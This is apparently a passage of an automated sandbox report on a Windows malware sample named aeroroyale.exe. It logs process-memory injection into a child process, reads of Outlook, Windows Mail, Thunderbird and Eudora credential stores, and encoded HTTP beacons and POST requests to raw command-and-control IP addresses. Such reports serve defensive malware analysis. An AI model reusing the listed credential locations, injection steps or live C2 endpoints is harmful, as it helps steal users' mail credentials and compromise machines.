| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x777ff29f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x777953a5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x777ff21a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x777ef70b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x777ef71b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x777ef72b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7779eb4e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Create Mapping | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, desired_access = FILE_MAP_READ |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (18)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Time | type = Ticks, time = 158091 |
|
2 | |
| Get Time | type = Ticks, time = 159105 |
|
1 | |
| Get Time | type = Ticks, time = 160119 |
|
1 | |
| Get Time | type = Ticks, time = 161133 |
|
1 | |
| Get Time | type = Ticks, time = 162147 |
|
1 | |
| Get Time | type = Ticks, time = 163161 |
|
1 | |
| Get Time | type = Ticks, time = 164175 |
|
1 | |
| Get Time | type = Ticks, time = 170275 |
|
1 | |
| Get Time | type = Ticks, time = 252518 |
|
4 | |
| Get Time | type = Ticks, time = 252581 |
|
1 | |
| Get Time | type = System Time, time = 2018-08-01 10:20:18 (UTC) |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\Nx3FADD397 |
|
1 | |
| Release | mutex_name = Global\Nx3FADD397 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Network Behavior
DNS (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = 239.255.255.250, address_out = 239.255.255.250, service = 1900 |
|
4 |
UDP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 503 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 2 |
| Contacted Hosts | 239.255.255.250:1900, 239.255.255.250:None |
UDP Session #1
| Information | Value |
|---|---|
| Handle | 0x448 |
| Address Family | AF_INET |
| Type | SOCK_DGRAM |
| Protocol | IPPROTO_UDP |
| Remote Address | 239.255.255.250 |
| Remote Port | - |
| Local Address | 192.168.0.220 |
| Local Port | 63296 |
| Data Sent | 503 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_UDP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Bind | local_address = 192.168.0.220, local_port = 63296, hint = OS assigned a local port from the dynamic client port range |
|
1 | |
| Send | remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 137, size_out = 137 |
|
1 | |
| Send | remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 132, size_out = 132 |
|
1 | |
| Send | remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 133, size_out = 133 |
|
1 | |
| Send | remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 101, size_out = 101 |
|
1 | |
| Close | type = SOCK_DGRAM |
|
1 |
UDP Server (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Bind | local_address = 192.168.0.220, local_port = 63296, hint = OS assigned a local port from the dynamic client port range |
|
1 |
HTTP Sessions (5)
| Information | Value |
|---|---|
| Total Data Sent | 1.71 KB |
| Total Data Received | 604.20 KB |
| Contacted Host Count | 3 |
| Contacted Hosts | 181.142.74.233, 204.184.25.164, 74.141.205.116 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | 181.142.74.233 |
| Server Port | 80 |
| Data Sent | 346 |
| Data Received | 8 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 181.142.74.233, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 17080=CWZZ8xG+qimIs4JLmfCTD8uEaAAPQ5uW5m/3/sEOJGiHx9WsJW/6vXHOVcYA4Tp9G1iOlk8QteuyaOY955LortwZ32jIs3Zh7vGJ+kBCA98Ce4ZD3W+h28Q8Sae74gZvJJCoRdG80JakNA+RZOtlmOiQyr5IMX3lXtiuQqwqdtenVipv1C+ouqApb7FW7L83aGRTc5V+WdEXQKfx+SpeVULEhQUtR9duN5nVPk9Xe9Jq9wad0ISWPHFXqrk2gSOZMvWc05zuC/Pf1Vtqp8l6rCVoQZow/3YHKVTtHu43t1DnurhDQyPyGgzfep2Jmr8hIBdUJwXwDbhlEscAxxa74DXoeC70G2hieetAkJKX6gsU1lwQTqPZycCN2QoRxlwT3lT9FFud7uXTWcGlcz9AuZBQOgp1vU0UzEvkwyKx/ARcU7iCSNF9XKeqo4w7t8h+q1h8SVqTQQ3+uD6kIzcaXU1kURHDyZ3ht+znkfQwPJcZwV2ubP7jDSI3DE4jap3FlUHDdj5Ls0OE5HMgh9K6GrgaTUK4lbJDDSH5qZv3Mw85L6XFuTS5ubDXXZGLQd/pPE4DVnsrHqnGJCmCEghj/8uOThxYoFhF4+Q1L58lWRzvZbXkDS8lTa50KUTZPTMoPOy13KmR/N96nH9mTUCT3tFLDRY=, url = 181.142.74.233 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 618356 |
|
1 | |
| Close Session | - |
|
5 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | 204.184.25.164 |
| Server Port | 443 |
| Data Sent | 346 |
| Data Received | 618364 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 204.184.25.164, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 33851=phfTzCKW4Tl/BW16W5kFXWvBkxgO+gzFE/vhBHTF43KTJuoA3Q2E5wpNa43Z8BAfTR1e20qtPY8fdfKyfgtU2CG9lT7HzmUoAXq71Mb93C80V3xF7HCdxpwckxOE5ZR2+/tuP4rJa7epXUt3HFFRepUNUfQnRZO5tZ/1+OyRJHjBiaV1cGIC3k2fQETnHfyBxPXhf56zmE+2CE6/CP78GawxyaW3aRsjO+ihGmBllyioMuK/V8HiAn95oHbs6LjIZJOK7Dum5szlhNl9nAWWjWr1nhnBY2VHFAeigJq7IN19x+tuNfZl8t9YiBcnPjPqRzqEA39/M66p8ok0yWRh2VIoFY+QsGfWKhtwa9B3ibo+q8vwomMhd8plGFEA5O9rizFcUzWX/L0dPk+jXrCd90pIdwUJ3nK4wzJX9xByICHPyJ4NszT3JogD1sZxf1ptaebJvU1vMOAC8w5h7qQf/ZJaFLsFw6XCc6GnCWCC2+2MTZPwTAva5op7JvWb/9TN5RfgzbBCMdTjmZg4uj5ZfTitOWLHhrn3hnfydNQJHEHL9IgByTV/m7w2MZpF6+kvac+NMZdWKVN0RAzxjEFc1SelyNzLKq+FCPiQQ/53ZbG/s/5yZZkD5VgGwkU0Sfem3d+Kq+d+3h/RV6rzt+DgwyA0y6EsQODD3BWu8YUHtYYkUfyj, url = 204.184.25.164 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 618356, size_out = 618356 |
|
1 | |
| Close Session | - |
|
5 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | 74.141.205.116 |
| Server Port | 80 |
| Data Sent | 361 |
| Data Received | 13 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = http, server_name = 74.141.205.116, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://74.141.205.116:443/whoami.php |
|
1 | |
| Read Response | size = 64, size_out = 13 |
|
1 | |
| Close Session | - |
|
5 |
HTTP Session #4
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | 74.141.205.116 |
| Server Port | 443 |
| Data Sent | 347 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 74.141.205.116, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 74.141.205.116 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Close Session | - |
|
5 |
HTTP Session #5
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | 74.141.205.116 |
| Server Port | 443 |
| Data Sent | 347 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 74.141.205.116, server_port = 443 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 74.141.205.116 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Close Session | - |
|
5 |
Process #9: aeroroyale.exe
204
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:03:27, Reason: Child Process |
| Unmonitor | End Time: 00:03:37, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd40 |
| Parent PID | 0xc08 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D44
0x
DA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00150fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00260000 | 0x002c6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x004f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00600fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x0120ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001210000 | 0x01210000 | 0x0130ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01310000 | 0x015defff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000015e0000 | 0x015e0000 | 0x016dffff | Private Memory | rw |
|
|
|
- |
| pstorec.dll | 0x66b10000 | 0x66b1cfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x66b50000 | 0x66bd3fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x73d80000 | 0x73d93fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x772e0000 | 0x7735afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd2c | address = 0x400000, size = 114688 |
|
1 | |
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd2c | address = 0x7ffdf008, size = 4 |
|
1 | |
| Modify Control Flow | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd2c | os_tid = 0xd44, address = 0x0 |
|
1 |
Host Behavior
File (40)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale_lng.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Profiles | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Thunderbird\Profiles | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Thunderbird | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount | type = size |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount | size = 1734, size_out = 1734 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount | size = 1506, size_out = 1506 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount | size = 670, size_out = 670 |
|
1 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 8 |
|
1 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 1 |
|
12 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 12 |
|
1 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 15 |
|
1 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 5 |
|
2 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 0 |
|
4 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 2 |
|
2 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 4 |
|
1 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 6 |
|
1 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | size = 7 |
|
1 |
Registry (100)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337} | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\Software\Microsoft\Internet Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0413e2ad850e7146953cbb4c2672287e | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1b5aad0cdb629e49a2c6203d4a6a948a | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1dab3177c2ac33448a4fe54b862a329e | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\2a7b899b94a04042a46a1cd96dc2a18c | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7a302ee0804dab4ba930ea4351b9b4ac | - |
|
1 | |
